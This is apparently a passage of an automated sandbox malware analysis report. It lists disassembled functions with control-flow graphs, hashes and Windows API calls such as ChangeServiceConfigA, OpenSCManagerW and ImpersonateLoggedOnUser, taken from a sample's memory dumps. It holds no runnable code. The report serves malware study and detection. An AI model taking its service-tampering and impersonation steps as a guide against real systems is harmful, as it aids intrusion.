                                                                                                                                                                                                                                                control_flow_graph 17 7ffbace21b10-7ffbace21b17 18 7ffbace21b22-7ffbace21b33 17->18 19 7ffbace21b19-7ffbace21b21 17->19 21 7ffbace21b34-7ffbace21b5d 18->21 19->18 21->21 22 7ffbace21b5f-7ffbace21bd8 21->22 25 7ffbace21c36-7ffbace21c68 22->25 26 7ffbace21bda-7ffbace21be9 22->26 31 7ffbace21cc7-7ffbace21d00 25->31 32 7ffbace21c6a-7ffbace21c7a 25->32 26->25 27 7ffbace21beb-7ffbace21bee 26->27 29 7ffbace21bf0-7ffbace21c03 27->29 30 7ffbace21c28-7ffbace21c30 27->30 33 7ffbace21c05 29->33 34 7ffbace21c07-7ffbace21c1a 29->34 30->25 40 7ffbace21d5e-7ffbace21d97 31->40 41 7ffbace21d02-7ffbace21d11 31->41 32->31 36 7ffbace21c7c-7ffbace21c7f 32->36 33->34 34->34 35 7ffbace21c1c-7ffbace21c24 34->35 35->30 37 7ffbace21c81-7ffbace21c94 36->37 38 7ffbace21cb9-7ffbace21cc1 36->38 42 7ffbace21c96 37->42 43 7ffbace21c98-7ffbace21cab 37->43 38->31 51 7ffbace21df6-7ffbace21e2f 40->51 52 7ffbace21d99-7ffbace21da9 40->52 41->40 44 7ffbace21d13-7ffbace21d16 41->44 42->43 43->43 45 7ffbace21cad-7ffbace21cb5 43->45 46 7ffbace21d50-7ffbace21d58 44->46 47 7ffbace21d18-7ffbace21d2b 44->47 45->38 46->40 49 7ffbace21d2d 47->49 50 7ffbace21d2f-7ffbace21d42 47->50 49->50 50->50 53 7ffbace21d44-7ffbace21d4c 50->53 58 7ffbace21e8e-7ffbace21ec7 51->58 59 7ffbace21e31-7ffbace21e41 51->59 52->51 54 7ffbace21dab-7ffbace21dae 52->54 53->46 56 7ffbace21db0-7ffbace21dc3 54->56 57 7ffbace21de8-7ffbace21df0 54->57 60 7ffbace21dc5 56->60 61 7ffbace21dc7-7ffbace21dda 56->61 57->51 69 7ffbace21f26-7ffbace21fe2 ChangeServiceConfigA 58->69 70 7ffbace21ec9-7ffbace21ed9 58->70 59->58 62 7ffbace21e43-7ffbace21e46 59->62 60->61 61->61 63 7ffbace21ddc-7ffbace21de4 61->63 64 7ffbace21e80-7ffbace21e88 62->64 65 7ffbace21e48-7ffbace21e5b 62->65 63->57 64->58 67 7ffbace21e5d 65->67 68 7ffbace21e5f-7ffbace21e72 65->68 67->68 68->68 71 7ffbace21e74-7ffbace21e7c 68->71 78 7ffbace21fe4 69->78 79 7ffbace21fea-7ffbace21ff9 69->79 70->69 72 7ffbace21edb-7ffbace21ede 70->72 71->64 73 7ffbace21ee0-7ffbace21ef3 72->73 74 7ffbace21f18-7ffbace21f20 72->74 76 7ffbace21ef5 73->76 77 7ffbace21ef7-7ffbace21f0a 73->77 74->69 76->77 77->77 80 7ffbace21f0c-7ffbace21f14 77->80 78->79 81 7ffbace21ffc call 7ffbace22049 79->81 80->74 83 7ffbace22001-7ffbace22025 81->83 83->81 84 7ffbace22027-7ffbace2202d 83->84 85 7ffbace2202f 84->85 86 7ffbace22034-7ffbace22048 84->86 85->86
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeConfigService
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3849694230-0
                                                                                                                                                                                                                                                • Opcode ID: eec680434cd26391f66dc67bd7af3d7ea623e728a669685e4e8d9415ea5e68ca
                                                                                                                                                                                                                                                • Instruction ID: 7d356157cbdbe5abd9dd0590c9a4ec2ce00a177d7912fd44eab8f94e2cb33150
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eec680434cd26391f66dc67bd7af3d7ea623e728a669685e4e8d9415ea5e68ca
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8F18170918A4D4FEB68DF28D84A7F977D1FB58311F10426AEC4EC7291DA74A9818B82
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00007FFBACE2077D Relevance: 1.8, APIs: 1, Instructions: 267COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                                                                                                                                • Opcode ID: 854fbae99b0c45fa18c62f703613fde1e94f20b0769851e9f3e395c066609854
                                                                                                                                                                                                                                                • Instruction ID: 3d0da71d02a92cd0b9778b20f5065de05fd0c8782894f77d24df589ef3528d16
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 854fbae99b0c45fa18c62f703613fde1e94f20b0769851e9f3e395c066609854
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4917170608A4D8FEB69DF28C8597E977D1FF58310F00417AE84EC7291DB74A945CB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00007FFBACE20C34 Relevance: 1.7, APIs: 1, Instructions: 212serviceCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 125 7ffbace20c34-7ffbace20c3b 126 7ffbace20c3d-7ffbace20c45 125->126 127 7ffbace20c46-7ffbace20c63 125->127 126->127 129 7ffbace20c64-7ffbace20c8d 127->129 129->129 130 7ffbace20c8f-7ffbace20ce5 129->130 133 7ffbace20d40-7ffbace20daa OpenServiceA 130->133 134 7ffbace20ce7-7ffbace20cf6 130->134 139 7ffbace20dac 133->139 140 7ffbace20db2-7ffbace20db3 133->140 134->133 135 7ffbace20cf8-7ffbace20cfb 134->135 137 7ffbace20cfd-7ffbace20d10 135->137 138 7ffbace20d35-7ffbace20d3d 135->138 141 7ffbace20d12 137->141 142 7ffbace20d14-7ffbace20d27 137->142 138->133 139->140 143 7ffbace20db5 140->143 141->142 142->142 144 7ffbace20d29-7ffbace20d31 142->144 145 7ffbace20dff-7ffbace20e01 143->145 146 7ffbace20db6-7ffbace20dde call 7ffbace20e02 143->146 144->138 146->143 149 7ffbace20de0-7ffbace20de6 146->149 150 7ffbace20ded-7ffbace20dfe 149->150 151 7ffbace20de8 149->151 150->145 151->150
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenService
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3098006287-0
                                                                                                                                                                                                                                                • Opcode ID: 5e89afcc1c1104cb5b1199825e288b6dae415f317efb01564368099cc61e6b67
                                                                                                                                                                                                                                                • Instruction ID: 1c8b7e0137f9e4d33731ed17292883f6815f6b8890e95865cd65ca90e2b63707
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e89afcc1c1104cb5b1199825e288b6dae415f317efb01564368099cc61e6b67
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF51A5B0919A4D4FEB59EF28C84A7E97BD1FB59311F10412EE84EC3292DE74E8418B91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00007FFBACE2108A Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 152 7ffbace2108a-7ffbace210b3 153 7ffbace210be-7ffbace21152 FindCloseChangeNotification 152->153 154 7ffbace210b5-7ffbace210bd 152->154 158 7ffbace21154 153->158 159 7ffbace2115a-7ffbace21181 153->159 154->153 158->159
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                • Opcode ID: 2756c3d7d240c352082f449e68eb85b30ee885b10b8eb837320cf47123931ffc
                                                                                                                                                                                                                                                • Instruction ID: 43afd53831c17f948471aff8b9d6662ada2d825df480397e1355f5f2f0fb318c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2756c3d7d240c352082f449e68eb85b30ee885b10b8eb837320cf47123931ffc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B831087090C78C5FDB1ADB6888157E9BFF0EF56321F04029FD089D31A2DA656856CB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00007FFBACE20B51 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 160 7ffbace20b51-7ffbace20bb8 163 7ffbace20bc2-7ffbace20bc7 160->163 164 7ffbace20bba-7ffbace20bbf 160->164 165 7ffbace20bd1-7ffbace20c08 OpenSCManagerW 163->165 166 7ffbace20bc9-7ffbace20bce 163->166 164->163 167 7ffbace20c10-7ffbace20c2d 165->167 168 7ffbace20c0a 165->168 166->165 168->167
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ManagerOpen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1889721586-0
                                                                                                                                                                                                                                                • Opcode ID: 3a0dfad5894b00a5c4195dff0de06112c67e055300e4832d1153653ce328d21a
                                                                                                                                                                                                                                                • Instruction ID: 95156cf966acdc5a1c19c167f1c2fc8ee75ab57043cb75c11f8c452e1f9dd63f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a0dfad5894b00a5c4195dff0de06112c67e055300e4832d1153653ce328d21a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65316F71908A1C8FDB69DF98D8896FABBE0EB68721F10412FD04AD3651DF70A445CB81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00007FFBACE21A41 Relevance: 1.6, APIs: 1, Instructions: 104serviceCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 169 7ffbace21a41-7ffbace21ad9 ControlService 172 7ffbace21adb 169->172 173 7ffbace21ae1-7ffbace21b09 169->173 172->173
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ControlService
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 253159669-0
                                                                                                                                                                                                                                                • Opcode ID: 27e232af9cf2d8adb562e1853d22b3a5c62592f240680ce7ade64d66f09c08d1
                                                                                                                                                                                                                                                • Instruction ID: 3a1f37c710e7584cb6524c300652dd1d244788b1bff62f928c1cc286ac45c15f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27e232af9cf2d8adb562e1853d22b3a5c62592f240680ce7ade64d66f09c08d1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E21B67190CA1C8FDB18DF9DD849AF97BE0EB69721F00413EE04AD3252DB70A846CB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00007FFBACE20108 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 174 7ffbace20108-7ffbace20114 176 7ffbace2012b-7ffbace21802 ImpersonateLoggedOnUser 174->176 177 7ffbace20116 174->177 181 7ffbace21804 176->181 182 7ffbace2180a-7ffbace21831 176->182 177->176 181->182
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9f303598d3b7434e4dfa92b68ce63981038b1f1b5b6713397876d574629c007c
                                                                                                                                                                                                                                                • Instruction ID: b2f43bfe66f80256a11182f1d8d975f072d2a541463af5ad97759507bd73a3f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f303598d3b7434e4dfa92b68ce63981038b1f1b5b6713397876d574629c007c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A321E37190CA0C8FDB58DF68D8497F9BBE0FB69321F00412ED04AD3192DB74A816CB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00AEF7C8 Relevance: .6, Instructions: 618COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 849d8723ba363a0274f8bd0a27da845a49407df08cd5ab604941507d6200c587
                                                                                                                                                                                                                                                • Instruction ID: d0bdb29ff74504426ab9cd08510767610bb5f5f6f3c35a1d84a9233fb4d0b9f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 849d8723ba363a0274f8bd0a27da845a49407df08cd5ab604941507d6200c587
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01229E357002458FDB14DB79D898A6E7BE6EF88310F1484B9E906CB3A2DA35DD06CB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE0908 Relevance: 7.8, Strings: 6, Instructions: 298COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: <Yq$hGq$hGq$hGq$hGq$hGq
                                                                                                                                                                                                                                                • API String ID: 0-9396448
                                                                                                                                                                                                                                                • Opcode ID: 16e41f41fa26d1da920caaa92367debb654a193b8cae5a9766352953d1b87f02
                                                                                                                                                                                                                                                • Instruction ID: e5d089f56d2b749e2567e2f8bc16141a694df8891cfb2f327a8c0edc37430aa7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16e41f41fa26d1da920caaa92367debb654a193b8cae5a9766352953d1b87f02
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1D1E074D01268CFDB68DF69C844BEDBBB6FB89300F1081AAD409A7291DB785AC5CF54
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE8C18 Relevance: 2.0, Instructions: 1973COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 328d13277651120db48e69a0f860117631f27fd11a78b1f92799c3c45a9c84d4
                                                                                                                                                                                                                                                • Instruction ID: 0cb006890a05afb73501c7acc94548a01c503edec39bf6416feb53123c33e0e6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 328d13277651120db48e69a0f860117631f27fd11a78b1f92799c3c45a9c84d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E13DB78901604DFCB16AB60E951DDDB332EF59306B1094AA9C113BFB8CA3B9947EF11
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE8C08 Relevance: 2.0, Instructions: 1972COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9e952cdc910f6f65388f303941da2acc8ea4aa6c85ee9df56548e716918506f1
                                                                                                                                                                                                                                                • Instruction ID: a913b50bcbe4328058ffbdbf86e0025e24e36449a566d623e7f8b1af59cec91f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e952cdc910f6f65388f303941da2acc8ea4aa6c85ee9df56548e716918506f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0913DB78901604DFCB16AB60E951DDDB332EF59306B1094AA9C113BFB8CA3B9947EF11
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AEEAD8 Relevance: 1.6, Strings: 1, Instructions: 350COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8q
                                                                                                                                                                                                                                                • API String ID: 0-596622023
                                                                                                                                                                                                                                                • Opcode ID: e48b46637ce1a415886b766ab20f4e23634b44de5f37697391846a72b16eb8ca
                                                                                                                                                                                                                                                • Instruction ID: 241a2c8928afc7a1bf17f83bc9f0e13a5fb445b0c2fcdeaf299c88ae10be7da8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e48b46637ce1a415886b766ab20f4e23634b44de5f37697391846a72b16eb8ca
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31E14D34A00249DFDB24DF69D994A5EBBF2FF88310F148568E4169B3A1DB35EC46CB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AEEACB Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8q
                                                                                                                                                                                                                                                • API String ID: 0-596622023
                                                                                                                                                                                                                                                • Opcode ID: cf866dd3fbef609d208d663e3249f4e9a7fbd111dbe44a091516554283ffae8d
                                                                                                                                                                                                                                                • Instruction ID: f3d8147944f17ebdda89ab7c9f0b3c648e43d3a4f92a3687f2e2e52888cb256c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf866dd3fbef609d208d663e3249f4e9a7fbd111dbe44a091516554283ffae8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED913F74A00249DFDB24DF65D998A9DBBB2FF88310B14C559E816AB361DB34EC42CF90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE2B3B Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8c[j
                                                                                                                                                                                                                                                • API String ID: 0-2858579698
                                                                                                                                                                                                                                                • Opcode ID: 1717e64ef86d89cbba6745749b9934a630bf088fd7b7b6d0facc5e824d197129
                                                                                                                                                                                                                                                • Instruction ID: 97d3ed188851fd6ed2b81c8f709ee50c7461498d8f94d413b91b162b1099a23f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1717e64ef86d89cbba6745749b9934a630bf088fd7b7b6d0facc5e824d197129
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32717C30901748CFCB04EFB8E98489DBBB6FF9A315B608569E416B7291DF359846CB10
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AEDB80 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8q
                                                                                                                                                                                                                                                • API String ID: 0-596622023
                                                                                                                                                                                                                                                • Opcode ID: e3599b54008910e210e5c74df489b164dfecf96103a63d66b23bf5e0e14ea0d7
                                                                                                                                                                                                                                                • Instruction ID: cd07e6a98d5f59350cd5d5846f44c2362ad34f9fe344ff17076a3272c4f9cf24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3599b54008910e210e5c74df489b164dfecf96103a63d66b23bf5e0e14ea0d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00717C34E003498FDB14DFA9C8546AEBBF2FF89304F248529E805AB395DB709D46CB81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE2B60 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8c[j
                                                                                                                                                                                                                                                • API String ID: 0-2858579698
                                                                                                                                                                                                                                                • Opcode ID: f18ccddd1eac439ff39bcb9739521c26e5f49f2401b36a56b385313205d97a37
                                                                                                                                                                                                                                                • Instruction ID: 7d4d8da359cbd548d2d381b8adacdc7ae2fc4b7ca9f19858f838ce65c1136cce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f18ccddd1eac439ff39bcb9739521c26e5f49f2401b36a56b385313205d97a37
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48612930911208CFCB14EFB8E9489ADBBB6FF8A316F60866CE41677294DF359845CB10
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE44B8 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8c[j
                                                                                                                                                                                                                                                • API String ID: 0-2858579698
                                                                                                                                                                                                                                                • Opcode ID: d4466866a2ed04608ebb3ca58270ef5850b362210303f811137178f7315bdff6
                                                                                                                                                                                                                                                • Instruction ID: 2eaeaf634cf30c391a92f29723fd26d12f537ae2d0cf7633bba7cc217b13aa46
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4466866a2ed04608ebb3ca58270ef5850b362210303f811137178f7315bdff6
